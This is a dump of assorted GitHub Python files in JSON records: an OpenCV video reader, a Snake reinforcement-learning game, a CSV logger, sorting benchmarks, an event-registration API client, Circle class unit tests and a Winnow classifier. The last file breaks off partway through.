+{"seq_id":"5979747561","text":"#!/usr/bin/env python3\n\nimport cv2\n\n\ndef main():\n window_name = \"OpenCV video example\"\n capture = cv2.VideoCapture(\"../Videos/Meditation_HDV_1080p25_Mp4___TanuriX_Stock_Footage.mp4\")\n\n while capture.isOpened():\n return_value, frame = capture.read()\n\n if return_value == True:\n cv2.imshow(window_name, frame)\n else:\n break\n \n if cv2.waitKey(int(1)) & 0xFF == ord('q'):\n break\n\n\n capture.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PXLAIRobotics/ROSNoeticDocker","sub_path":"ExampleCode/01_OpenCV/02_ReadVideo/01_read_video.py","file_name":"01_read_video.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"71317290393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport random\nfrom enum import Enum\nfrom typing import Tuple\n\nimport numpy as np\nimport pygame\nimport torch\n\nfrom sgai.agent.trainer import Trainer\n\nBLOCK_SIZE = 20\nSPEED = 100\n\npygame.init()\nfont = pygame.font.Font(\"fonts/arial.ttf\", 25)\n\n# Colors\nclass GameColors(Enum):\n WHITE: Tuple = (255, 255, 255)\n RED: Tuple = (150, 0, 0)\n DARK_GREEN: Tuple = (0, 60, 10)\n LIGHT_GREEN: Tuple = (50, 160, 80)\n BLACK: Tuple = (0, 0, 0)\n\n\nclass GameDirection(Enum):\n RIGHT = 1\n LEFT = 2\n UP = 3\n DOWN = 4\n\n\nclass GamePointOnTheMap:\n def __init__(self, x: int, y: int) -> None:\n self._x = None\n self._y = None\n\n self.x = x\n self.y = y\n\n def __eq__(self, other):\n if self.x == other.x and self.y == other.y:\n return True\n return False\n\n @property\n def x(self):\n return self._x\n\n @property\n def y(self):\n return self._y\n\n @x.setter\n def x(self, x):\n self._x = x\n\n @y.setter\n def y(self, y):\n self._y = y\n\n\nclass ExampleSnakeGame:\n def __init__(self, w: int = 640, h: int = 480):\n self.w = w\n self.h = h\n # init display\n self.display = pygame.display.set_mode((self.w, self.h))\n pygame.display.set_caption(\"Snake\")\n self.clock = pygame.time.Clock()\n self.reset_game_state()\n\n def reset_game_state(self):\n # Initialize game state\n self.direction = GameDirection.RIGHT\n\n self.head = GamePointOnTheMap(self.w / 2, self.h / 2)\n self.snake = [\n self.head,\n GamePointOnTheMap(self.head.x - BLOCK_SIZE, self.head.y),\n GamePointOnTheMap(self.head.x - (2 * BLOCK_SIZE), self.head.y),\n ]\n\n self.score = 0\n self.food = None\n self._place_food()\n self.frame_iteration_number = 0\n\n def _place_food(self):\n x = random.randint(0, (self.w - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n y = random.randint(0, (self.h - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n self.food = GamePointOnTheMap(x, y)\n if self.food in self.snake:\n self._place_food()\n\n def play_step(self, action) -> Tuple[int, bool, int]:\n self.frame_iteration_number += 1\n # 1. collect user input\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n # 2. move\n self._move(action) # update the head\n self.snake.insert(0, self.head)\n\n # 3. Update the game state\n\n # Eat food: +10\n # Game Over: -10\n # Else: 0\n reward = 0\n game_over = False\n if self.is_collision() or self.frame_iteration_number > 100 * len(self.snake):\n game_over = True\n reward = -10\n return reward, game_over, self.score\n\n # 4. place new food or just move\n if self.head == self.food:\n self.score += 1\n reward = 10\n self._place_food()\n else:\n self.snake.pop()\n\n # 5. update ui and clock\n self._update_ui()\n self.clock.tick(SPEED)\n # 6. return game over and score\n return reward, game_over, self.score\n\n def is_collision(self, point=None):\n if point is None:\n point = self.head\n # Check if it hits the boundary\n if (\n point.x > self.w - BLOCK_SIZE\n or point.x < 0\n or point.y > self.h - BLOCK_SIZE\n or point.y < 0\n ):\n return True\n # Check if it hits itself\n if point in self.snake[1:]:\n return True\n return False\n\n def _update_ui(self):\n self.display.fill(GameColors.BLACK.value)\n\n for pt in self.snake:\n pygame.draw.rect(\n self.display,\n GameColors.DARK_GREEN.value,\n pygame.Rect(pt.x, pt.y, BLOCK_SIZE, BLOCK_SIZE),\n )\n pygame.draw.rect(\n self.display,\n GameColors.LIGHT_GREEN.value,\n pygame.Rect(pt.x + 4, pt.y + 4, 12, 12),\n )\n\n pygame.draw.rect(\n self.display,\n GameColors.RED.value,\n pygame.Rect(self.food.x, self.food.y, BLOCK_SIZE, BLOCK_SIZE),\n )\n\n text = font.render(f\"Score: {self.score}\", True, GameColors.WHITE.value)\n self.display.blit(text, [0, 0])\n pygame.display.flip()\n\n def _move(self, action):\n # [straight, right, left]\n\n clock_wise = [\n GameDirection.RIGHT,\n GameDirection.DOWN,\n GameDirection.LEFT,\n GameDirection.UP,\n ]\n move_index = clock_wise.index(self.direction)\n\n if np.array_equal(action, [1, 0, 0]):\n new_direction = clock_wise[move_index] # no change\n elif np.array_equal(action, [0, 1, 0]):\n next_idx = (move_index + 1) % 4\n new_direction = clock_wise[next_idx]\n else: # [0, 0, 1]\n next_idx = (move_index - 1) % 4\n new_direction = clock_wise[next_idx]\n\n self.direction = new_direction\n\n x = self.head.x\n y = self.head.y\n if self.direction == GameDirection.RIGHT:\n x += BLOCK_SIZE\n elif self.direction == GameDirection.LEFT:\n x -= BLOCK_SIZE\n elif self.direction == GameDirection.DOWN:\n y += BLOCK_SIZE\n elif self.direction == GameDirection.UP:\n y -= BLOCK_SIZE\n\n self.head = GamePointOnTheMap(x=x, y=y)\n\n\nclass MyTrainer(Trainer):\n def __init__(\n self,\n game,\n input_size: int,\n output_size: int,\n hidden_size: int,\n ):\n super().__init__(\n game,\n input_size=input_size,\n output_size=output_size,\n hidden_size=hidden_size,\n )\n\n def get_state(self) -> np.ndarray:\n head = self.game.snake[0]\n point_left = GamePointOnTheMap(head.x - 20, head.y)\n point_right = GamePointOnTheMap(head.x + 20, head.y)\n point_up = GamePointOnTheMap(head.x, head.y - 20)\n point_down = GamePointOnTheMap(head.x, head.y + 20)\n\n left_direction = self.game.direction == GameDirection.LEFT\n right_direction = self.game.direction == GameDirection.RIGHT\n up_direction = self.game.direction == GameDirection.UP\n down_direction = self.game.direction == GameDirection.DOWN\n state = [\n # Danger is straight ahead\n (right_direction and self.game.is_collision(point_right))\n or (left_direction and self.game.is_collision(point_left))\n or (up_direction and self.game.is_collision(point_up))\n or (down_direction and self.game.is_collision(point_down)),\n # Danger is on the right\n (up_direction and self.game.is_collision(point_right))\n or (down_direction and self.game.is_collision(point_left))\n or (left_direction and self.game.is_collision(point_up))\n or (right_direction and self.game.is_collision(point_down)),\n # Danger is on the left\n (down_direction and self.game.is_collision(point_right))\n or (up_direction and self.game.is_collision(point_left))\n or (right_direction and self.game.is_collision(point_up))\n or (left_direction and self.game.is_collision(point_down)),\n # Current move direction\n left_direction,\n right_direction,\n up_direction,\n down_direction,\n # Food location\n self.game.food.x < self.game.head.x, # Food is on the left\n self.game.food.x > self.game.head.x, # Food is on the right\n self.game.food.y < self.game.head.y, # Food is up\n self.game.food.y > self.game.head.y, # Food is down\n ]\n\n return np.array(state, dtype=int)\n\n def perform_action(self, final_move) -> Tuple[int, bool, int]:\n reward, game_over, score = self.game.play_step(final_move)\n return reward, game_over, score\n\n\nif __name__ == \"__main__\":\n mt = MyTrainer(\n game=ExampleSnakeGame(),\n input_size=11,\n output_size=3,\n hidden_size=512,\n )\n mt.train(model_file=\"model.pth\")\n","repo_name":"John15321/sgai","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":8357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22911888005","text":"import threading\nimport datetime\nimport os\n\"\"\"\n {'version': 1, 'name': 'LoggingConfig', 'event': 'data', 'timestamp': 1376140, 'variables': {'pm.vbat': 3.7161290645599365, 'stabilizer.roll': -0.45266175270080566}}\n\"\"\"\nclass LogCSVNode(threading.Thread):\n \n def __init__(self, outputDirectory, fileNameFormat, loggingSubscriber):\n super().__init__()\n self.loggingSubscriber = loggingSubscriber\n self.read = True;\n self.fileNameFormat = fileNameFormat\n self.files = { }\n self.firstLine = {}\n self.outputDirectory = outputDirectory\n\n def stop(self):\n self.read = False\n\n def run(self):\n print(\"Started listener node\")\n while self.read:\n data = self.loggingSubscriber.receiveData();\n fileName = self.makeFileName(data[\"name\"])\n if fileName not in self.files:\n try:\n file = self.createFile(fileName)\n except Exception:\n print(\"Failed to create file for \" + fileName)\n continue;\n else:\n file = self.files[fileName]\n\n self.writeData(file, data, fileName)\n\n def writeData(self, file, data, fileName):\n if data[\"event\"] == \"data\":\n outputString = str(data[\"timestamp\"])\n columnString = \"timestamp\"\n for key in sorted(data[\"variables\"]):\n columnString += \",\" + key\n outputString += \",\" + str(data[\"variables\"][key]) \n if self.firstLine[fileName]:\n file.write(columnString + \"\\n\")\n self.firstLine[fileName] = False\n file.write(outputString + \"\\n\")\n \n def makeFileName(self, configName):\n return self.fileNameFormat.replace(\"%d%\", str(datetime.datetime.now().date())).replace(\"%name%\", configName)\n\n def createFile(self, fileName):\n self.files[fileName] = open(os.path.join(self.outputDirectory, fileName), \"a\")\n test = open(os.path.join(self.outputDirectory, fileName), \"r\")\n self.firstLine[fileName] = test.readline() == \"\"\n return self.files[fileName]\n\n def closeFiles(self):\n for file in self.files:\n self.files[file].close()\n","repo_name":"simplexsigil/cfTrainingSampler","sub_path":"framework/logging/nodes/LogCSV.py","file_name":"LogCSV.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27518997112","text":"import time\nimport random\nimport os\n\n\ndef generator_de_nr_pt_teste():\n teste = []\n with open('input.txt', \"r\") as f:\n nr_teste = int(f.readline())\n for line in f:\n teste.append([int(x) for x in line.strip().split()])\n\n # in matricea teste, teste[index][0] e nr de numere, iar teste[index][1] e val. maxima\n index = 1\n while index <= nr_teste:\n fisier = \"test\" + str(index) + \".txt\"\n lista_random = []\n for i in range(0, teste[index - 1][0]):\n lista_random.append(random.randint(1, teste[index - 1][1]))\n\n with open(fisier, \"w\") as g:\n g.write(str(lista_random).replace(\", \", \" \").replace(\"[\", \"\").replace(\"]\", \"\"))\n\n with open('lista_fisiere.txt', \"a\") as g:\n g.write(fisier + \"\\n\")\n index += 1\n return teste\n\n\ndef merge(lista_citita, st, mij, dr):\n n1 = mij - st + 1\n n2 = dr - mij\n stanga = [0] * (n1)\n dreapta = [0] * (n2)\n for i in range(0, n1):\n stanga[i] = lista_citita[st + i]\n for j in range(0, n2):\n dreapta[j] = lista_citita[mij + 1 + j]\n i = 0\n j = 0\n k = st\n while i < n1 and j < n2:\n if stanga[i] <= dreapta[j]:\n lista_citita[k] = stanga[i]\n i += 1\n else:\n lista_citita[k] = dreapta[j]\n j += 1\n k += 1\n while i < n1:\n lista_citita[k] = stanga[i]\n i += 1\n k += 1\n while j < n2:\n lista_citita[k] = dreapta[j]\n j += 1\n k += 1\n\n\ndef merge_sort(lista_citita, st, dr):\n try:\n if st < dr:\n mij = st + (dr - st) // 2\n merge_sort(lista_citita, st, mij)\n merge_sort(lista_citita, mij + 1, dr)\n merge(lista_citita, st, mij, dr)\n\n return lista_citita\n except:\n print(\"Nu se poate realiza sortarea\")\n\n\ndef counting_sort_radix(lista_citita, exponent):\n try:\n lista_cu_index = [0] * 10\n for element in lista_citita:\n lista_cu_index[(element // exponent) % 10] += 1\n\n for index in range(1, len(lista_cu_index)):\n lista_cu_index[index] += lista_cu_index[index - 1]\n\n output = [0] * len(lista_citita)\n index = len(lista_citita) - 1\n while index >= 0:\n output[lista_cu_index[(lista_citita[index] // exponent) % 10] - 1] = lista_citita[index]\n lista_cu_index[(lista_citita[index] // exponent) % 10] -= 1\n index -= 1\n\n return output\n except:\n print(\"Nu se poate sorta\")\n\n\ndef radix_sort(lista_citita):\n try:\n exponent = 1\n while max(lista_citita) // exponent > 0:\n lista_citita = counting_sort_radix(lista_citita, exponent)\n exponent *= 10\n return lista_citita\n except:\n print(\"Nu se poate realiza sortarea\")\n\n\ndef shell_sort(lista_citita):\n try:\n interval = len(lista_citita) // 2\n while interval > 0:\n for i in range(interval, len(lista_citita)):\n temp = lista_citita[i]\n j = i\n while j >= interval and lista_citita[j - interval] > temp:\n lista_citita[j] = lista_citita[j - interval]\n j -= interval\n\n lista_citita[j] = temp\n interval //= 2\n\n return L\n except:\n print(\"Nu se poate realiza sortarea\")\n\n\ndef counting_sort(lista_citita):\n try:\n lista_cu_index = [0] * (int(max(lista_citita)) + 1)\n for element in lista_citita:\n lista_cu_index[element] += 1\n\n for index in range(1, len(lista_cu_index)):\n lista_cu_index[index] += lista_cu_index[index - 1]\n\n output = [0] * len(lista_citita)\n\n index = len(lista_citita) - 1\n while index >= 0:\n output[lista_cu_index[lista_citita[index]] - 1] = lista_citita[index]\n lista_cu_index[lista_citita[index]] -= 1\n index -= 1\n\n return output\n except time.time:\n print(\"Nu se poate realiza sortarea\")\n\n\ndef heap_sort(lista_citita):\n build_heap(lista_citita)\n\n for index in range(len(lista_citita) - 1, 0, -1):\n lista_citita[index], lista_citita[0] = lista_citita[0], lista_citita[index]\n heapify(lista_citita, index, 0)\n\n return lista_citita\n\n\ndef build_heap(lista_citita):\n try:\n for index in range(len(lista_citita) // 2 - 1, -1, -1):\n heapify(lista_citita, len(lista_citita), index)\n except:\n print(\"Nu se poate realiza sortarea\")\n\n\ndef heapify(lista_citita, lungime_heap, i):\n try:\n index_tata = i\n index_fiu_stanga = 2 * i + 1\n index_fiu_dreapta = 2 * i + 2\n\n if index_fiu_stanga < lungime_heap and lista_citita[index_fiu_stanga] > lista_citita[index_tata]:\n index_tata = index_fiu_stanga\n\n if index_fiu_dreapta < lungime_heap and lista_citita[index_fiu_dreapta] > lista_citita[index_tata]:\n index_tata = index_fiu_dreapta\n\n if index_tata != i:\n lista_citita[i], lista_citita[index_tata] = lista_citita[index_tata], lista_citita[i]\n heapify(lista_citita, lungime_heap, index_tata)\n except:\n print(\"Nu se poate realiza sortarea\")\n\n\nteste = generator_de_nr_pt_teste()\n\nprint(\"TIM SORT-SORTARE IMPLICITA PYTHON\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L.sort()\n stop = time.time()\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n nrtest += 1\n\nprint(\"HEAP SORT\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = heap_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nprint(\"COUNTING SORT\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = counting_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nnrtest = 1\nprint(\"MERGE SORT\")\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = merge_sort(L, 0, len(L) - 1)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nnrtest = 1\nprint(\"RADIX SORT\")\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = radix_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nprint(\"SHELL SORT\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = shell_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nos.remove(\"lista_fisiere.txt\")\n","repo_name":"AlexTrandafir09/Tema-1-Laborator-SD","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18986941287","text":"import asyncio\nfrom http import HTTPStatus\nfrom typing import Any, Coroutine, Callable\n\nfrom aiohttp import ClientSession, TCPConnector\n\nfrom common.depreg.dto import DepregParticipantsDTO, DepregGroupDTO\nfrom common.depreg.exceptions import DepregAPIError\nfrom common.requests import CommonRequest, CommonResponse\nfrom config import maintenance_settings, depreg_config\n\n\nclass DepregAPI:\n \"\"\"\n Интеграция с API Департамента Регистрации Мероприятий\n docs: https://app.swaggerhub.com/apis/cimmwolf/et.depreg.ru/2.1.0#/\n \"\"\"\n _headers: dict[str, str] = {'accept': 'application/json'}\n\n def __init__(self, config: dict[str, Any] = None):\n self._request_class: type[CommonRequest] = CommonRequest\n self._session: ClientSession = self._get_session()\n\n if not config:\n config = depreg_config\n self._base_url: str = config[\"base_url\"]\n self._auth_type: str = config[\"auth_type\"]\n\n async def get_participants(\n self,\n event_id: int,\n token: str,\n fields: str | None = None,\n page: int = 1,\n ) -> DepregParticipantsDTO:\n \"\"\"\n Позволяет получить постраничный доступ к списку участников мероприятия.\n\n Parameters API:\n filter[eventId]* (integer): ID события; required: true;\n fields (string): Список полей, разделённых запятыми, которые будут возвращены.;\n page (integer): Страница списка; minimum: 1\n\n Response example:\n [\n {\n \"id\": 0,\n \"eventId\": 0,\n \"groupId\": 0,\n \"code\": \"string\",\n \"name\": \"Пантелеймон\",\n \"surname\": \"string\",\n \"patronymic\": \"string\",\n \"email\": \"user@example.com\",\n \"phone\": \"string\",\n \"company\": \"string\",\n \"info\": {},\n \"marked\": true\n }\n ]\n \"\"\"\n query_params: dict[str, Any] = {\n \"filter[eventId]\": event_id,\n \"page\": page,\n }\n if fields:\n query_params[\"fields\"] = fields\n\n request_data: dict[str, Any] = dict(\n url=self._base_url + \"/participants\",\n method=\"GET\",\n query=query_params,\n session=self._session,\n headers=self._headers,\n auth_type=self._auth_type,\n token=token,\n )\n response: CommonResponse = await self._make_request(request_data)\n response_data: list[dict[str, Any]] = []\n response_data.extend(response.data)\n\n page_count: int = int(response.raw.headers['X-Pagination-Page-Count'])\n current_page: int = int(response.raw.headers['X-Pagination-Current-Page'])\n\n await self._process_pagination(\n page_count=page_count,\n current_page=current_page,\n response_data=response_data,\n event_id=event_id,\n token=token,\n )\n\n return DepregParticipantsDTO(**{\"data\": response_data})\n\n async def _process_pagination(\n self,\n page_count: int,\n current_page: int,\n response_data: list[dict[str, Any]],\n event_id: int,\n token: str,\n ) -> None:\n async_tasks: list[Coroutine | None] = []\n for page in range(current_page + 1, page_count + 1):\n query_params: dict[str, Any] = {\n \"filter[eventId]\": event_id,\n \"page\": page,\n }\n request_data: dict[str, Any] = dict(\n url=self._base_url + \"/participants\",\n method=\"GET\",\n query=query_params,\n session=self._session,\n headers=self._headers,\n auth_type=self._auth_type,\n token=token,\n )\n async_tasks.append(self._make_request(request_data))\n\n [response_data.extend(result.data) for result in await asyncio.gather(*async_tasks)]\n\n async def get_group_by_id(self, group_id: int, token: str) -> DepregGroupDTO:\n \"\"\"\n Возвращает информацию о конкретной группе, чей ID указан в URL\n\n Parameters API:\n group_id* (integer): ID группы; required: true;\n\n Response example:\n {\n \"id\": 4584,\n \"eventId\": 1471,\n \"templateId\": null,\n \"createdAt\": \"2023-10-10 13:45:24\",\n \"name\": \"14:00-15:00\"\n }\n \"\"\"\n request_data: dict[str, Any] = dict(\n url=self._base_url + f\"/groups/{group_id}\",\n method=\"GET\",\n session=self._session,\n headers=self._headers,\n auth_type=self._auth_type,\n token=token,\n )\n response: CommonResponse = await self._make_request(request_data)\n return DepregGroupDTO(**response.data)\n\n async def _make_request(self, request_data: dict[str, Any]) -> CommonResponse:\n request_get: Callable[..., Coroutine] = self._request_class(**request_data)\n response = await request_get()\n if response.status == HTTPStatus.OK:\n return response\n raise DepregAPIError\n\n def _get_session(self) -> ClientSession:\n if maintenance_settings.get(\"environment\", \"dev\"):\n return ClientSession(connector=TCPConnector(verify_ssl=False))\n return ClientSession()\n\n async def __aenter__(self) -> \"DepregAPI\":\n \"\"\"\n Nothing on entering context manager\n \"\"\"\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:\n if not self._session.closed:\n await self._session.close()\n","repo_name":"r2r2/strana_backend","sub_path":"cabinet/common/depreg/depreg_api.py","file_name":"depreg_api.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32976848395","text":"class Solution(object):\n def longestCommonSubsequence(self, text1, text2):\n \"\"\"\n :type text1: str\n :type text2: str\n :rtype: int\n \"\"\"\n rows = len(text1)\n cols = len(text2)\n matching = [[0 for j in range(rows+1) ]for i in range(cols+1)]\n # print(matching)\n for i in range(1, cols+1):\n for j in range(1, rows+1):\n # print(text2[i-1], text1[j-1],i,j)\n if text2[i-1] == text1[j-1]:\n matching[i][j] = 1+ matching[i-1][j-1]\n else:\n matching[i][j] = max( matching[i][j - 1] , matching[i-1][j])\n\n return (matching[cols][rows])\n\n\n\n\nsol = Solution()\ntext1 = \"\"\ntext2 = \"\"\nprint(sol.longestCommonSubsequence(text1,text2))","repo_name":"nithinveer/leetcode-solutions","sub_path":"Longest Common Subsequence.py","file_name":"Longest Common Subsequence.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19331801973","text":"#!/usr/bin/env python3\n# -----------------------------------------------------------\n# test_circle_class.py\n# uses unittest module to test Circle class module\n# -----------------------------------------------------------\n\n\nimport unittest\nfrom io import StringIO\nfrom contextlib import redirect_stdout\nfrom circle_class import Circle\n\nclass CircleClassTest(unittest.TestCase):\n\n def test_circle_init(self):\n c = Circle()\n self.assertEqual(c.radius, 1)\n c = Circle(4)\n self.assertEqual(c.radius, 4)\n with self.assertRaises(TypeError):\n c = Circle(-100)\n self.assertEqual(Circle(4), c)\n\n def test_diameter(self):\n c = Circle()\n self.assertEqual(c.diameter, 2)\n c = Circle(4)\n self.assertEqual(c.diameter, 8)\n\n def test_set_diameter(self):\n c = Circle(4)\n c.diameter = 2\n self.assertEqual(c.diameter, 2)\n self.assertEqual(c.radius, 1)\n with self.assertRaises(ValueError):\n c.diameter = -100\n\n def test_get_area(self):\n c = Circle(2)\n self.assertAlmostEqual(c.area, 12.5663706, places=7)\n with self.assertRaises(AttributeError):\n c.area = 13\n\n def test_from_diameter(self):\n c = Circle.from_diameter(8)\n self.assertEqual(c.diameter, 8)\n self.assertEqual(c.radius, 4)\n self.assertEqual(Circle(1.0), Circle.from_diameter())\n with self.assertRaises(ValueError):\n Circle.from_diameter(-100)\n\n def test_str_method(self):\n c = Circle()\n f = StringIO()\n with redirect_stdout(f):\n print(c)\n self.assertIn(\"Circle with radius: 1.\", f.getvalue())\n\n def test_repr_method(self):\n c = Circle()\n self.assertEqual(\"Circle(1.0)\", repr(c))\n d = eval(repr(c))\n self.assertEqual(c.radius, d.radius)\n\n\n def test_two_circle_add(self):\n c = Circle(2)\n d = Circle(4)\n self.assertEqual(6, (c + d).radius)\n self.assertEqual(12, (c + d).diameter)\n with self.assertRaises(TypeError):\n d = c + 'Square'\n\n def test_circle_mul(self):\n c = Circle(3)\n self.assertEqual(9, (c * 3).radius) # Test __mul__\n with self.assertRaises(TypeError):\n d = c * 'monkey'\n self.assertEqual(9, (3 * c).radius) # Test __rmul__\n self.assertAlmostEqual(9.00, (3.0 * c).radius, places=2)\n\n def test_lt_oper(self):\n c = Circle(0)\n d = Circle(2)\n self.assertEqual(True, c < d)\n self.assertEqual(True, d > c)\n self.assertEqual(False, c == d)\n c = eval(repr(d))\n self.assertEqual(False, c < d)\n self.assertEqual(False, d > c)\n self.assertEqual(True, c == d)\n\n with self.assertRaises(TypeError):\n print(c == 'monkey')\n with self.assertRaises(TypeError):\n print(c < 'monkey')\n\n\n def test_sort_circles(self):\n cl = [Circle(6), Circle(7), Circle(8), Circle(4), Circle(0),\n Circle(2), Circle(3), Circle(5), Circle(9), Circle(1)]\n cl.sort()\n self.assertEqual(cl,\n [Circle(0), Circle(1), Circle(2), Circle(3), Circle(4),\n Circle(5), Circle(6), Circle(7), Circle(8), Circle(9)]\n )\n\n def test_reflected_numerics(self):\n a = Circle(4)\n self.assertTrue(a * 3 == 3 * a)\n\n def test_augmented_assignment(self):\n a = Circle(4)\n b = Circle(2)\n a += b\n self.assertEqual(Circle(6), a)\n\n a *= 2\n self.assertEqual(Circle(12), a)\n\n a /= 2\n self.assertEqual(Circle(6), a)\n\n def test_sub_circles(self):\n a = Circle(4)\n b = Circle(2)\n self.assertEqual(Circle(2), a - b)\n self.assertEqual(Circle(0), b - a)\n\n def test_div_circles(self):\n a = Circle(10)\n self.assertEqual(Circle(5), a / 2)\n with self.assertRaises(ZeroDivisionError):\n print(a / 0)\n with self.assertRaises(ValueError):\n print(a / -2)\n\n def test_floor_div_circles(self):\n a = Circle(9)\n self.assertEqual(Circle(4), a // 2)\n with self.assertRaises(ZeroDivisionError):\n print(a // 0)\n with self.assertRaises(ValueError):\n print(a // -2)\n","repo_name":"UWPCE-PythonCert-ClassRepos/Wi2018-Online","sub_path":"students/ChrisH/lesson08/test_circle_class.py","file_name":"test_circle_class.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31029597844","text":"import random\n\nstart = 5\n\ndef even_odd(num):\n if num % 2 == 0:\n print(\"{} is even\".format(num))\n else:\n print(\"{} is odd\".format(num))\n\nwhile start > 0 :\n valor = int(random.randint(1, 99))\n even_odd(valor)\n start -= 1\n","repo_name":"tiware23/treehouseNe","sub_path":"even.py","file_name":"even.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3817428627","text":"import numpy as np\nimport pandas as pd\n\n\nclass Winnow:\n\n def __init__(self, amount_features):\n self.n = amount_features\n self.weights = np.ones(amount_features)\n\n def __call__(self, data, labels):\n num_mistakes = 0\n while True:\n print(f\"current weights: {self.weights}\")\n num_mistake = 0\n for i in range(len(data)):\n row = data[i]\n print(f\"{i}th row: {row} ,label: {labels[i]}\")\n row_sum = np.sum(np.array([self.weights[j] * row[j] for j in range(self.n)]))\n print(f\"sum: {row_sum}, threshold: {self.n}\")\n if row_sum > self.n:\n if labels[i] == 0:\n num_mistake += 1\n for k in range(self.n):\n if row[k] == 1:\n self.weights[k] = 0\n num_mistakes += 1\n break\n else:\n if labels[i] == 1:\n num_mistake += 1\n for k in range(self.n):\n if row[k] == 1:\n self.weights[k] = 2 * self.weights[k]\n num_mistakes += 1\n break\n if num_mistake == 0:\n print(f\"the algo made: {num_mistakes} mistakes\")\n print(f\"final weights: {self.weights}\")\n break\n","repo_name":"LiorBreitman8234/ML_Ex","sub_path":"Ex3/Winnow.py","file_name":"Winnow.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"21072998623","text":"\"\"\"\nKeeps data up to date\n\"\"\"\n\nimport logging\nimport requests\nfrom multiprocessing import Process, Queue\nimport time\nimport sqlalchemy as s\nimport pandas as pd\nimport os\nimport json\nlogging.basicConfig(filename='housekeeper.log')\n\nclass Housekeeper:\n\n def __init__(self, jobs, broker, broker_host, broker_port, user, password, host, port, dbname):\n\n self.broker_host = broker_host\n self.broker_port = broker_port\n self.broker = broker\n DB_STR = 